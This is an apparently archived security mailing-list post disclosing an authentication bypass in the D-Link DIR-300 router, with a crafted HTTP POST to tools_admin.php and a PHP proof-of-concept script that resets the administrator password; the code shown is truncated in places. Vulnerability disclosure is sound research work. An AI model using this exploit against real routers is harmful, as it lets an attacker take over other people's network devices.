[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

D-Link DIR-300 authentication bypass

Hello, I found security bug in D-Link DIR-300 wireless router. It can
be used to bypass authentication mechanizm by attacker with access to
web interface. I reported it to D-Link but they are not replying for
my emails. According to other D-Link security holes and their status I
think that they won't reply, so I decided to write about it here.

[Technical details]

Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:

---cut here---
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

---cut here---

If attacker makes this request to the control panel, the
administrator username is set to admin with password ,,uhOHahEh".


- All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05).
- There is possibility that other dlink devices which use the same php
scripts in control panel are affected. I'm not able to check it
because I don't have devices for tests. I'm counting on you ;->


---cut here---
        if(sizeof($argv)!=4) {
                echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
        curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php";);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_PORT, $argv[2]);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
        echo "+ starting request\n";
        $out = curl_exec($ch);
        if($out===false) {
                echo "- Error: could not connect (
        } else
                echo "+ request sended\n";
        if(stripos($out,"Successfully")===false) {
                echo "- something goes wrong (check answer - answer.html) !\n";
                $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
                echo "+ ok, now you can login using l: admin p:$argv[3]\n";
---cut here---


 - Information sent to vendor 07.08.2010
 - No response
 - Information resended to vendor 07.31.2010
 - No response from vendor

Karol CeliÅski ( Celin )
Pentester/Researcher @ Safe Computing


karol at celin dot pl

Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing